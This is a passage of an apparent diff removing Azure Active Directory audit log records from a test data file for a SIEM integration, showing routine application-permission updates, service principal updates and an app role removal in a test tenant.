"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "8f6eb24b-6e61-4ee2-a376-31368c300613"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:33:26", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]"}, {"NewValue": "RequiredResourceAccess", "OldValue": "", "Name": "Included Updated Properties"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "528b5206-f6de-4c1f-86db-5f750a9960c9"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:33:26.1037807Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38438635"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "8f6eb24b-6e61-4ee2-a376-31368c300613"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:33:26", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "OldValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "Name": "RequiredResourceAccess"}, {"NewValue": "RequiredResourceAccess", "OldValue": "", "Name": "Included Updated Properties"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "528b5206-f6de-4c1f-86db-5f750a9960c9"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:33:26.1037807Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38438635"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "8f6eb24b-6e61-4ee2-a376-31368c300613"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:33:26", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "Included Updated Properties", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "528b5206-f6de-4c1f-86db-5f750a9960c9"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:33:26.1638042Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38438642"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "b2cc2456-5ac5-4399-b960-82a40036476f"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:33:26", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "Included Updated Properties", "OldValue": "", "NewValue": ""}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "528b5206-f6de-4c1f-86db-5f750a9960c9"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:33:26.1638042Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38438642"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "b2cc2456-5ac5-4399-b960-82a40036476f"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "ac045271-8d7f-49b2-abc9-5130051d879f"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:06.3062012Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38464425"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "7f09b681-251f-4ff0-97cf-5247891b6981"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": 